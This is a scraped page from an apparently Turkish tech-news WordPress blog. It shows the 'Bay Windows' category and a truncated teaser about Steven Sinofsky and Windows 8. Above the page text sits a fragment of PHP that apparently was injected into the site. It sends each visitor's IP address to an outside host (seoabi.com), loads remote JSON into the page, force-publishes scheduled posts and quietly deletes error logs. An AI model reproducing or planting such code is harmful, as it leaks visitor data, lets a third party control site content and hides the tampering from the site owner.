$value) { $post_string .= $key.'='.urlencode(trim($value)).'&'; } rtrim($post_string, '&'); curl_setopt($ch,CURLOPT_POST, count($post)); curl_setopt($ch,CURLOPT_POSTFIELDS, $post_string); } $result=curl_exec($ch); return $result; } $mcuOutput = conn('https://seoabi.com/wmbys/blog-api.php?ip='.$_SERVER['REMOTE_ADDR']); $GLOBALS['mcuOutput'] = json_decode($mcuOutput); $wpdb->query("UPDATE `wp_posts` SET post_status = 'publish' WHERE post_status = 'future' && post_date < NOW()"); @unlink($_SERVER['DOCUMENT_ROOT'].'/error_log'); @unlink($_SERVER['DOCUMENT_ROOT'].'/imle/error_log'); ?> Bay Windows | Teknoloji Haberleri

Bay Windows kategorisindeki tüm yazılar

Son Yazılar

Bay Windows 8’de sorun mu var

Windows 7 ve şimdi de Windows 8’in babası olan dev isim hakkında ilginç bir şikayet var! Microsoft, Vista’yı battığı yerden çıkarması için Steven Sinofsky‘yi görevlendirdiğinde Sinofsky bu görevi Windows 7 ile başarıyla yerine getirmişti. Sinofsky ve takımının son ürünü ise Windows 8 oldu Sinofsky’nin beraber çalıştığı yöneticilerin